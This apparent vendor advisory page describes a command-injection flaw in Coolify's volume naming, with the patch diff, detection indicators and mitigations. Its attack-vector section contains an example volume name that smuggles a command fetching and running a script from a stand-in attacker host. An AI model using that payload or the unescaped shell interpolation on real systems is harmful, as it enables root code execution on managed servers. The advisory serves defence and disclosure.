Skip to main content
CVE Vulnerability Database
Vulnerability Database/CVE-2026-42143

CVE-2026-42143: Coolify RCE Vulnerability

CVE-2026-42143 is a remote code execution flaw in Coolify that allows authenticated users to execute arbitrary commands as root through malicious volume names. This article covers technical details, affected versions, and patches.

Published:

CVE-2026-42143 Overview

Coolify is an open-source, self-hostable platform for managing servers, applications, and databases. CVE-2026-42143 is a command injection vulnerability [CWE-78] in Coolify versions prior to 4.0.0-beta.471. User-controlled persistent volume names are interpolated directly into shell commands executed on managed servers without escaping or validation. An authenticated member can inject shell metacharacters through a volume name and execute arbitrary commands as root when volume operations run. The issue is fixed in version 4.0.0-beta.471.

Critical Impact

Any authenticated Coolify member can achieve root-level remote code execution on managed servers by injecting shell metacharacters into persistent volume names.

Affected Products

  • Coolify versions prior to 4.0.0-beta.471
  • coollabsio/coolify self-hosted deployments managing Docker volumes
  • Any managed server where Coolify triggers volume operations

Discovery Timeline

  • 2026-07-07 - CVE-2026-42143 published to the National Vulnerability Database (NVD)
  • 2026-07-07 - Last updated in NVD database
  • Fix released - Coolify v4.0.0-beta.471 publishes the patched release on GitHub

Technical Details for CVE-2026-42143

Vulnerability Analysis

The vulnerability is a classic OS command injection [CWE-78] rooted in unsafe string interpolation. Coolify constructs Docker CLI commands by concatenating user-controlled volume names directly into shell strings. When the resulting command is dispatched to a managed server, the shell interprets metacharacters such as ;, &&, |, and backticks contained in the volume name. Because Coolify executes management commands with elevated privileges on the target host, injected payloads run as root. The attack requires an authenticated Coolify user with permission to create or manage persistent volumes, satisfying the low-privilege prerequisite reflected in the vulnerability metrics.

Root Cause

The root cause is the absence of shell argument escaping around the $storage->name value used to build Docker commands in app/Actions/Service/DeleteService.php and related storage handlers in app/Livewire/Project/Service/Storage.php. Volume names were accepted from authenticated users and passed through PHP string interpolation into docker volume rm -f and similar commands. No input validation restricted the character set of the volume name, and no escaping function such as escapeshellarg wrapped the value.

Attack Vector

An authenticated member creates a persistent volume with a crafted name containing shell metacharacters, for example: myvol; curl attacker.tld/x | sh. When any workflow triggers a volume operation, such as service deletion or redeployment, Coolify assembles and runs the shell command on the managed server, executing the injected payload as root.

php
// Vulnerable pattern (pre-patch) and fix from app/Actions/Service/DeleteService.php
foreach ($storagesToDelete as $storage) {
-    $commands[] = "docker volume rm -f $storage->name";
+    $commands[] = 'docker volume rm -f '.escapeshellarg($storage->name);
}
// Execute volume deletion first, this must be done first otherwise volumes will not be deleted.

Source: GitHub commit d2064dd. The patch replaces raw string interpolation with escapeshellarg(), neutralizing shell metacharacters in the volume name before command execution.

Detection Methods for CVE-2026-42143

Indicators of Compromise

  • Persistent volume names containing shell metacharacters such as ;, |, &, $(, or backticks in the Coolify database or UI.
  • Unexpected child processes of the Docker daemon or Coolify agent on managed servers, especially shells (sh, bash) spawning network utilities.
  • Outbound connections from managed hosts to unknown IPs immediately following volume delete or redeploy events.
  • New cron entries, SSH authorized_keys modifications, or root-owned files created around the time of Coolify volume operations.

Detection Strategies

  • Audit the Coolify database table storing volume records and alert on any name field containing characters outside [A-Za-z0-9_-].
  • Inspect Coolify application logs for docker volume rm -f or similar command strings referencing unusual volume names.
  • Correlate Coolify volume operation events with process execution telemetry on managed hosts to identify anomalous child processes spawned by the Docker CLI or SSH session.

Monitoring Recommendations

  • Enable command-line auditing (auditd execve) on all Coolify-managed servers and forward events to a central log platform.
  • Alert on shell interpreters spawned as descendants of dockerd, containerd, or the Coolify SSH sessions during volume lifecycle actions.
  • Monitor outbound network egress from managed servers for connections to previously unseen destinations following Coolify management events.

How to Mitigate CVE-2026-42143

Immediate Actions Required

  • Upgrade Coolify to v4.0.0-beta.471 or later on every self-hosted instance.
  • Review all existing persistent volume names and delete or rename any containing shell metacharacters before triggering volume operations.
  • Rotate credentials and SSH keys used by Coolify to manage remote servers if compromise is suspected.
  • Audit membership of Coolify teams and revoke access for accounts that no longer require it, since exploitation requires an authenticated member.

Patch Information

The fix is delivered in Coolify release v4.0.0-beta.471. The code changes are documented in GitHub commit d2064dd and GitHub Security Advisory GHSA-6pmw-6m96-4v4m. The patch wraps volume names with escapeshellarg() and introduces a ValidationPatterns support class to constrain user-supplied identifiers.

Workarounds

  • Restrict Coolify member creation and limit volume management permissions to trusted administrators until the upgrade is applied.
  • Enforce a strict naming policy in operational procedures that only permits alphanumeric characters, hyphens, and underscores in volume names.
  • Isolate Coolify-managed servers on a segmented network and block outbound egress by default to limit the impact of successful exploitation.
bash
# Upgrade a self-hosted Coolify instance
curl -fsSL https://cdn.coollabs.io/coolify/install.sh | sudo bash -s -- v4.0.0-beta.471

# Verify installed version
docker exec coolify php artisan about | grep -i version

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.